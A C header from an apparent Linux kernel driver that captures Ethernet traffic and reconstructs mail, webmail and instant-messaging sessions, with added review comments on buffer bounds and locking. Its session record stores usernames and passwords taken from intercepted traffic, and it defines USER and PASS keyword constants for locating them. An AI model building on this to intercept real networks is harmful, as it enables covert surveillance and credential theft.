
📄 list.h

📁 Linux下面截获以太网数据包!是在内核态下面运行的驱动程序
#ifndef __LIST_H_
#define __LIST_H_

/*
 * Packet-size limits for the data queue, which is organised as a
 * circular (ring) queue.  The original trailing comments list 1518 and
 * 1514 as alternative values for the two 1520 limits.
 */
#define _MAX_PACKET_LEN   1520
#define _LONG_PACKET_LEN  1520
#define _SHORT_PACKET_LEN 100

/*
 * Application-protocol identifiers (APP_TYPE_*).
 *
 * NOTE(review): the values are written in hex but jump from 0x09 (FTP) to
 * 0x10 (TELNET), so 0x0A-0x0F are unused; treat them as opaque IDs rather
 * than a dense table index.  APP_TYPE_TCP sits alone at 0x10000000 --
 * presumably a generic/flag value; confirm against the code that sets the
 * AppType field.
 */
#define APP_TYPE_INIT      0x00000000
#define APP_TYPE_SMTP      0x00000001
#define APP_TYPE_POP3      0x00000002
#define APP_TYPE_HTTP_MAIL 0x00000003
#define APP_TYPE_DNS       0x00000004
#define APP_TYPE_MSN       0x00000005
#define APP_TYPE_QQ        0x00000006
#define APP_TYPE_ICQ       0x00000007
#define APP_TYPE_YAHOOMSG  0x00000008
#define APP_TYPE_FTP       0x00000009
#define APP_TYPE_TELNET    0x00000010
#define APP_TYPE_HTTP_URL  0x00000011
#define APP_TYPE_IRC       0x00000012
#define APP_TYPE_PP        0x00000013
#define APP_TYPE_GTALK     0x00000014
#define APP_TYPE_AOL       0x00000015
#define APP_TYPE_HTTP_POST 0x00000016
#define APP_TYPE_TCP       0x10000000

/*
 * Four-letter mail-protocol keywords, as C strings.
 * NOTE(review): USER and PASS carry an SMTP_ prefix here although the
 * integer forms below are named POP3_*; confirm which parser uses which.
 */
#define SMTP_AUTH "AUTH"
#define SMTP_USER "USER" /* bytes 0x55 0x53 0x45 0x52 */
#define SMTP_PASS "PASS" /* bytes 0x50 0x41 0x53 0x53 */
#define POP3_RETR "RETR" /* bytes 0x52 0x45 0x54 0x52 */

/*
 * The same keywords packed into a 32-bit integer.  The *_UINT values hold
 * the ASCII bytes in reading order (most significant byte first); the
 * *_UINT1 values are the byte-swapped form, i.e. what a little-endian
 * 32-bit load of the four characters produces.
 *
 * NOTE(review): only the upper-case spelling is encoded.  If these are
 * compared directly against payload bytes, lower- or mixed-case commands
 * would not match -- confirm the parser normalises case first.
 */
#define POP3_USER_UINT  0x55534552 /* 'U' 'S' 'E' 'R' */
#define POP3_PASS_UINT  0x50415353 /* 'P' 'A' 'S' 'S' */
#define POP3_RETR_UINT  0x52455452 /* 'R' 'E' 'T' 'R' */
#define POP3_USER_UINT1 0x52455355 /* 'R' 'E' 'S' 'U' */
#define POP3_PASS_UINT1 0x53534150 /* 'S' 'S' 'A' 'P' */
#define POP3_RETR_UINT1 0x52544552 /* 'R' 'T' 'E' 'R' */

/*
 * Named combinations of SMTP_HASH_TYPE_* bits.  The bit values themselves
 * are defined inside the SMTP_HASH_HEAD declaration further down; macros
 * expand lazily, so the order of definition does not matter.
 */

/* Combinations for which the hash head is removed and the file is written. */
#define REMOVE_HASHHEAD_WRITE \
	(SMTP_HASH_TYPE_DOT | SMTP_HASH_TYPE_SEQ | SMTP_HASH_TYPE_FIN)
#define REMOVE_HASHHEAD_WRITE_OR_PART \
	(SMTP_HASH_TYPE_DOT | SMTP_HASH_TYPE_SEQ | SMTP_HASH_TYPE_FIN | SMTP_HASH_TYPE_PART)

/* Combinations for which the file is written but the hash head is kept. */
#define NON_REMOVE_HASHHEAD_WRITE \
	(SMTP_HASH_TYPE_DOT | SMTP_HASH_TYPE_SEQ | SMTP_HASH_TYPE_PART)
#define NON_REMOVE_HASHHEAD_WRITE_PREW \
	(SMTP_HASH_TYPE_DOT | SMTP_HASH_TYPE_SEQ | SMTP_HASH_TYPE_PART | SMTP_HASH_TYPE_PREW)
#define ONE_OF_MAIL \
	(SMTP_HASH_TYPE_DOT | SMTP_HASH_TYPE_SEQ)

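/*
 * Build profile.  SERVER is defined unconditionally on the next line, so
 * both "#else" tables below are dead unless that line is removed.
 */
#define SERVER

#ifdef	SERVER

/*
 * Ring, pool and table capacities for the SERVER profile.  The trailing
 * notes are the author's alternative values; the "M"/"G" figures appear to
 * be memory estimates.
 * NOTE(review): these are hard upper bounds on queued traffic; what happens
 * when a ring or pool is full (drop, block, overwrite) is decided by code
 * that is not in this header -- confirm it fails closed and is counted.
 */
#define	_MAX_CYC_ARRAY_DEPTH		40000		//20000	30M	 60000 60M
#define	_MAX_UDP_CYC_ARRAY_DEPTH	40000		//20000	30M	 60000 60M
#define	_MAX_CYC_SAFE_NUMBER		500
#define	_MAX_LEISURE_POOL_DEPTH		70000
#define	_LONG_LEISURE_POOL_DEPTH	800000		//40%100M	 120000	360M 900000	1.5G	60000	180M 600000	1G
#define	_SHORT_LEISURE_POOL_DEPTH	800000		//60%100M	 180000	360M 1350000 1.5G	90000	180M 900000	1G 
#define	_HASH_HEAD_NUMBER			100000
/* Parenthesised so the product stays intact inside a larger expression
 * (for example "x % _BIG_MM" or "x / _BIG_MM"). */
#define	_BIG_MM						(1024 * 1000 * 50)
#define	_MAX_RULE_IP_HASH_BUCKET	4999

#else

#define	_MAX_CYC_ARRAY_DEPTH		4000
#define	_MAX_UDP_CYC_ARRAY_DEPTH	4000		//20000	30M	 60000 60M
#define	_MAX_CYC_SAFE_NUMBER		1			//100
#define	_MAX_LEISURE_POOL_DEPTH		1500
#define	_HASH_HEAD_NUMBER			1000
#define	_LONG_LEISURE_POOL_DEPTH	4000		//40%30000
#define	_SHORT_LEISURE_POOL_DEPTH	4000		//60%30000
#define	_MAX_RULE_IP_HASH_BUCKET	9			//4999

#endif//SERVER

#ifdef SERVER

/*
 * Hash-table bucket counts per protocol.  The author's note lists prime
 * candidates: 4999, 9973, 15451, 19997, 29989.
 * NOTE(review): the hash function is not visible in this header.  If it is
 * computed only from addresses/ports taken from traffic, the fixed modulus
 * makes bucket placement predictable -- confirm chain length per bucket is
 * bounded.
 */
#define _MAX_SMTP_HASH_BUCKET		9973//primes: 4999,9973,15451,19997,29989
#define _MAX_HTTP_HASH_BUCKET		9973
#define _MAX_MSN_HASH_BUCKET		9973
#define _MAX_HTTP_POST_BUCKET		9973
#define _MAX_FTP_HASH_BUCKET		499
#define _MAX_TELNET_HASH_BUCKET		499
#define _MAX_ICQ_HASH_BUCKET		499
#define _MAX_YAHOO_HASH_BUCKET		499
#define _MAX_IRC_HASH_BUCKET		499
#define _MAX_AOL_HASH_BUCKET		499
#define _MAX_PP_HASH_BUCKET			499
#define _MAX_GTALK_HASH_BUCKET		499

#define _MAX_IP_HASH_BUCKET			4999
#define _MAX_DOMAIN_HASH_BUCKET		4999

#else

/* NOTE(review): unlike the SERVER table, 99 (= 9 * 11) is not prime. */
#define _MAX_SMTP_HASH_BUCKET		499//primes: 4999,9973,
#define _MAX_HTTP_HASH_BUCKET		499
#define _MAX_MSN_HASH_BUCKET		499
#define _MAX_HTTP_POST_BUCKET		499
#define _MAX_FTP_HASH_BUCKET		99
#define _MAX_TELNET_HASH_BUCKET		99
#define _MAX_ICQ_HASH_BUCKET		99
#define _MAX_YAHOO_HASH_BUCKET		99
#define _MAX_IRC_HASH_BUCKET		99
#define _MAX_AOL_HASH_BUCKET		99
#define _MAX_PP_HASH_BUCKET			99
#define _MAX_GTALK_HASH_BUCKET		99

#define _MAX_IP_HASH_BUCKET			499
#define _MAX_DOMAIN_HASH_BUCKET		499

#endif//SERVER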

/*
 * Node of a doubly linked list: one pointer to the previous node and one
 * to the next.  Other structures in this header embed it as their first
 * member.
 */
typedef struct _DOUBLE_LIST_ITEM DOUBLE_LIST_ITEM, *PDOUBLE_LIST_ITEM;

struct _DOUBLE_LIST_ITEM {
	PDOUBLE_LIST_ITEM	pPre;	/* previous node */
	PDOUBLE_LIST_ITEM	pNext;	/* next node */
};


/*
 * Anchor of a doubly linked list: first item, last item, an item count,
 * and a semaphore stored alongside them.
 *
 * NOTE(review): fastMutex is a struct semaphore and presumably serialises
 * access to the list.  Taking a semaphore may sleep, so confirm it is
 * never acquired from atomic context (for example a packet receive hook).
 */
typedef struct _DOUBLE_LIST_HEAD DOUBLE_LIST_HEAD, *PDOUBLE_LIST_HEAD;

struct _DOUBLE_LIST_HEAD {
	PDOUBLE_LIST_ITEM	pHead;
	PDOUBLE_LIST_ITEM	pTail;
	struct semaphore	fastMutex;
	unsigned int		iNumber;	/* count of all items */
};

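/*
 * Per-session tracking record ("hash head").  Despite the SMTP_ prefix the
 * field comments show it is shared by several protocols (web mail / HTTP,
 * IRC, MSN), which is why many fields are overlaid with anonymous unions.
 *
 * The macros defined between the fields are ordinary file-scope macros;
 * they are kept next to the field they were written beside.
 *
 * NOTE(review): user/pass hold credentials taken from captured traffic in
 * clear text.  The code that fills and releases this record is not in this
 * header; confirm that (a) copies are clamped to _MAX_USER_LEN /
 * _MAX_PASS_LEN -- iUserLen/iPassLen are 16-bit and can express far larger
 * values than the 48- or 24-byte buffers hold -- and (b) the buffers are
 * cleared before the record is reused or freed.
 */
typedef	struct _SMTP_HASH_HEAD
{
	DOUBLE_LIST_ITEM	item;		//embedded list node (first member)
	PDOUBLE_LIST_ITEM	pHead;
	PDOUBLE_LIST_ITEM	pTail;
	PDOUBLE_LIST_ITEM	pSeq;		//the	last item	of sequence
	
	//http
	PDOUBLE_LIST_ITEM	pSHead;
	PDOUBLE_LIST_ITEM	pSTail;
	PDOUBLE_LIST_ITEM	pSSeq;		//the	last item	of sequence	
	UINT				ruleID;
	USHORT				webMailType;

	PWEB_MAIL_CONFIG	pConfig;
	
	//end	http
	USHORT		sPort;
	UINT		sIP;
	UINT		dIP;
	
	union
	{
		USHORT	type;			//
		USHORT	webOldMailType;	//web mail	pre	mail type	== webMailType;
	};

#define	WEBMAIL_INIT			0X0000
#define	WEBMAIL_RECEIVE			0X0001
#define	WEBMAIL_SEND			0X0002	
#define	WEBMAIL_ATTACH			0X0100
#define	WEBMAIL_CON				0X0200
#define	WEBMAIL_ADDLIST			0X0004

#define	SMTP_HASH_TYPE_INIT		0X0000	
#define	SMTP_HASH_TYPE_DOT		0X0001		//one	mail end
#define	SMTP_HASH_TYPE_SEQ		0X0002		//order	packet
#define	SMTP_HASH_TYPE_FIN		0X0004		//FIN	session
#define	SMTP_HASH_TYPE_PART		0X0010		//one	of mails
#define	SMTP_HASH_TYPE_PREW		0X0020		//pre	write	disk
#define	SMTP_HASH_TYPE_DELETE	0X0040		//delete pre write file

#define	MSN_HASH_TYPE_INIT		0X0000
#define	MSN_HASH_TYPE_BEGIN		0X1000
#define	MSN_HASH_TYPE_END		0X2000

#define	IM_HASH_TYPE_LOGIN		0X0001
#define	IM_HASH_TYPE_LOGOUT		0X0002
#define	IM_HASH_TYPE_MSG		0X0004

	UINT			iNumber;				//count	of the all item	
	
	// NOTE(review): the offsets below are signed 16-bit; whoever indexes a
	// packet buffer with them should check for negative and out-of-range values.
	union
	{
		short 		iEml;					//count	of the emls	in this	session
		short  		iWebMail;				//count	of the web mail	in this	session
		short 		sUser_offset;			//IRC	SOURCE USER
	};
	
	USHORT			iFilePath;
	union
	{
		USHORT		iPart;					//sign the eml number	in one session
		short 		dUser_offset;			//IRC	DEST USER
	};
#define	_MAX_SMTP_HASH_PART_NUMBER		0	//3
	USHORT			iSeqCount;
		
	UINT			iSeqLen;

// LINUX_X64 is defined unconditionally here, so the "#else" branches
// guarded by it in this declaration are dead unless this line is removed.
#define LINUX_X64

#ifdef	LINUX_X64

// The length macros are fully parenthesised so that they keep their value
// inside a larger expression (e.g. "2 * _MAX_HASH_PRE_WRITE_LEN").
#define	_MAX_HASH_PRE_WRITE_COUNT	5
#define	_MAX_HASH_PRE_WRITE_LEN		(5 * ( _LONG_PACKET_LEN ) - 1)
	
#else

#define	_MAX_HASH_PRE_WRITE_COUNT	1
#define	_MAX_HASH_PRE_WRITE_LEN		(1 * ( _LONG_PACKET_LEN ) - 1)

#endif

	struct timeval	timeStamp;			//the	first	packet time

	char	bPrew;		//sign of	Prew
	char 	bCrypt;

	// if bPrew is	true,then	the	follow packet's	seq	
	// must greater or	equal	this value
	UINT	nextSeqNumber;
	
	//http
	union
	{
		UINT	nextSSeqNumber;
		char	bCMsg;
	};

	union
	{
		UINT	cAck;
		char	bsuser;
	};
	
	union
	{
		UINT	sAck;
		char	bduser;
	};
	
	//end	http
	struct timeval	timelast;
	
	//control	file output
	union
	{
		char	bDelete;	//Delete the file
		char	bSMsg;
	};
	char		bFileHeader;	//the	eml	file header
	__u16		smtpPop3Type;	//same as	PACKET_DATA.type
	
#ifdef LINUX_X64

#define	_MAX_USER_LEN				48
#define	_MAX_PASS_LEN				48	

#else

#define	_MAX_USER_LEN				24
#define	_MAX_PASS_LEN				24	

#endif

#define	_MAX_MSN_USER_LEN			_MAX_USER_LEN
	__u16		iUserLen;		//user name length
	__u16		iPassLen;		//password length
	__u32		iPop3BeginSeq;
	
	//user name (overlaid with suser, same size)
	union
	{
		char	user[_MAX_USER_LEN];
		char	suser[_MAX_MSN_USER_LEN];
	};
	
	//user password (overlaid with duser; duser is sized by _MAX_MSN_USER_LEN,
	//which equals _MAX_PASS_LEN only while the two limits stay the same)
	union
	{
		char	pass[_MAX_PASS_LEN];
		char	duser[_MAX_MSN_USER_LEN];
	};

	UINT		susTotalBytes;
}SMTP_HASH_HEAD, *PSMTP_HASH_HEAD;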

/*
 * Three one-byte status flags for the control thread.
 *
 * NOTE(review): if these flags are read and written by different threads,
 * plain char gives no atomicity or ordering guarantee -- confirm how they
 * are synchronised.
 */
typedef struct _CTRL_THREAD_CTX CTRL_THREAD_CTX, *PCTRL_THREAD_CTX;

struct _CTRL_THREAD_CTX {
	char	bParserLoad;	/* parser has been loaded */
	char	bParserUnload;	/* unload the parser */
	char	bReady;
};

/*
 * Values for the 16-bit "type" field: a protocol bit (SMTP/POP3) combined
 * with a direction bit (CLIENT/SERVER).  These are file-scope macros; the
 * replacement lists are spelled exactly as in the SHORT_PACKET_DATA copy so
 * the repeated definitions stay compatible.
 */
#define PACKET_TYPE_INIT			0X0000
#define PACKET_TYPE_SMTP			0X0001			/* SMTP packet */
#define PACKET_TYPE_POP3			0X0002			/* POP3 packet */
#define PACKET_TYPE_CLIENT			0X0100			/* client packet */
#define PACKET_TYPE_SERVER			0X0200			/* server packet */

#define PACKET_TYPE_SMTP_CLIENT			(PACKET_TYPE_SMTP|PACKET_TYPE_CLIENT)
#define PACKET_TYPE_SMTP_SERVER			(PACKET_TYPE_SMTP|PACKET_TYPE_SERVER)
#define PACKET_TYPE_POP3_CLIENT			(PACKET_TYPE_POP3|PACKET_TYPE_CLIENT)
#define PACKET_TYPE_POP3_SERVER			(PACKET_TYPE_POP3|PACKET_TYPE_SERVER)

#define	WEB_MAIL_BEGIN_PACKET				0X1000
#define	WEB_MAIL_END_PACKET					0X2000

/*
 * One captured frame plus its parse metadata.  buf is a fixed array of
 * _LONG_PACKET_LEN + 20 bytes.
 *
 * NOTE(review): len is 32-bit and dataLen/dataOffset are 16-bit, so all
 * three can describe more bytes than buf holds.  The code that fills and
 * reads this record is not in this header; confirm it rejects frames
 * larger than buf and checks dataOffset + dataLen against len before
 * touching the payload.
 */
typedef struct _PACKET_DATA PACKET_DATA, *PPACKET_DATA;

struct _PACKET_DATA {
	UINT		len;			/* total length: Ethernet + IP + TCP + data */
	USHORT		dataLen;		/* payload length */
	USHORT		dataOffset;		/* payload offset, counted from the MAC header */
	UINT		nextSeqNumber;
	UINT		IPType;
	PWEB_MAIL_CONFIG pConfig;
	UINT		AppType;
	USHORT		type;			/* pop3/smtp and client/server marker */
	UINT		ruleID;
	char		buf[ _LONG_PACKET_LEN + 20 ];
};

/*
 * These repeat, token for token, the PACKET_TYPE_* definitions that
 * accompany PACKET_DATA; identical redefinition is permitted, but the two
 * copies must be kept in step.
 */
#define PACKET_TYPE_INIT			0X0000
#define PACKET_TYPE_SMTP			0X0001			/* SMTP packet */
#define PACKET_TYPE_POP3			0X0002			/* POP3 packet */
#define PACKET_TYPE_CLIENT			0X0100			/* client packet */
#define PACKET_TYPE_SERVER			0X0200			/* server packet */

#define PACKET_TYPE_SMTP_CLIENT			(PACKET_TYPE_SMTP|PACKET_TYPE_CLIENT)
#define PACKET_TYPE_SMTP_SERVER			(PACKET_TYPE_SMTP|PACKET_TYPE_SERVER)
#define PACKET_TYPE_POP3_CLIENT			(PACKET_TYPE_POP3|PACKET_TYPE_CLIENT)
#define PACKET_TYPE_POP3_SERVER			(PACKET_TYPE_POP3|PACKET_TYPE_SERVER)

/*
 * Small-buffer variant of PACKET_DATA: the same metadata fields in the
 * same order, followed by a 111-byte buffer.
 *
 * NOTE(review): the buffer size is the literal 110 + 1, not derived from
 * _SHORT_PACKET_LEN (100).  Confirm that whatever decides a packet is
 * "short" uses a limit that fits this array.
 */
typedef struct _SHORT_PACKET_DATA SHORT_PACKET_DATA, *PSHORT_PACKET_DATA;

struct _SHORT_PACKET_DATA {
	UINT		len;			/* total length: Ethernet + IP + TCP + data */
	USHORT		dataLen;		/* payload length */
	USHORT		dataOffset;		/* payload offset, counted from the MAC header */
	UINT		nextSeqNumber;
	UINT		IPType;
	PWEB_MAIL_CONFIG pConfig;
	UINT		AppType;
	USHORT		type;			/* pop3/smtp and client/server marker */
	UINT		ruleID;
	char		buf[ 110 + 1 ];
};


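/*
 * Direction / protocol tests on a PACKET_TYPE_* bit mask.
 *
 * The argument is parenthesised in every use: '&' binds tighter than '|',
 * so without the parentheses an argument such as (a | b) would be grouped
 * as a | (b & PACKET_TYPE_CLIENT) and the test would report the wrong
 * direction.  The argument is evaluated twice in the two-bit tests, so do
 * not pass an expression with side effects.
 *
 * IS_FROM_CLIENT / IS_FROM_SERVER yield the masked bit (zero or non-zero);
 * the SMTP/POP3 variants yield 0 or 1.
 */
#define IS_FROM_CLIENT( packet_type )			( ((packet_type) & PACKET_TYPE_CLIENT) )
#define IS_FROM_SERVER( packet_type )			( ((packet_type) & PACKET_TYPE_SERVER) )
#define IS_FROM_SMTP_CLIENT( packet_type )		( ((packet_type) & PACKET_TYPE_SMTP) && ((packet_type) & PACKET_TYPE_CLIENT))
#define IS_FROM_POP3_CLIENT( packet_type )		( ((packet_type) & PACKET_TYPE_POP3) && ((packet_type) & PACKET_TYPE_CLIENT))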

/*
 * Circular array of packet pointers with a 64-bit atomic write counter and
 * a 64-bit atomic read counter.  The array has _MAX_CYC_ARRAY_DEPTH slots.
 *
 * NOTE(review): how the counters are turned into slot indices is not
 * visible here; confirm every access reduces them into
 * [0, _MAX_CYC_ARRAY_DEPTH) and that a full ring cannot overwrite a slot
 * the reader has not consumed yet.
 */
typedef struct _CYC_ARRAY_HEAD CYC_ARRAY_HEAD, *PCYC_ARRAY_HEAD;

struct _CYC_ARRAY_HEAD {
	atomic64_t		iWrite;
	atomic64_t		iRead;
	PPACKET_DATA	PacketArray[ _MAX_CYC_ARRAY_DEPTH ];
};

/*
 * List element that carries a full-size PACKET_DATA.  The list node is the
 * first member, followed by two one-byte flags and a timestamp.
 *
 * NOTE(review): bDynamic and bLong are not documented in this header;
 * presumably they record how the element was allocated and which of the
 * two element layouts (long/short) it is -- confirm before casting between
 * DOUBLE_LIST_PACKET and SHORT_DOUBLE_LIST_PACKET.
 */
typedef struct _DOUBLE_LIST_PACKET DOUBLE_LIST_PACKET, *PDOUBLE_LIST_PACKET;

struct _DOUBLE_LIST_PACKET {
	DOUBLE_LIST_ITEM	doubleListItem;
	char				bDynamic;
	char				bLong;
	struct timeval		timeStamp;	/* time of the first packet */
	PACKET_DATA			packet;
};


/*
 * List element that carries a SHORT_PACKET_DATA.  Its leading members
 * (list node, bDynamic, bLong, timeStamp) match DOUBLE_LIST_PACKET in type
 * and order; only the trailing packet member differs.
 *
 * NOTE(review): an element of this type is much smaller than a
 * DOUBLE_LIST_PACKET.  Confirm that code handling both through a common
 * pointer checks which layout it has before reading or writing packet.buf.
 */
typedef struct _SHORT_DOUBLE_LIST_PACKET SHORT_DOUBLE_LIST_PACKET, *PSHORT_DOUBLE_LIST_PACKET;

struct _SHORT_DOUBLE_LIST_PACKET {
	DOUBLE_LIST_ITEM	doubleListItem;
	char				bDynamic;
	char				bLong;
	struct timeval		timeStamp;
	SHORT_PACKET_DATA	packet;
};

#endif
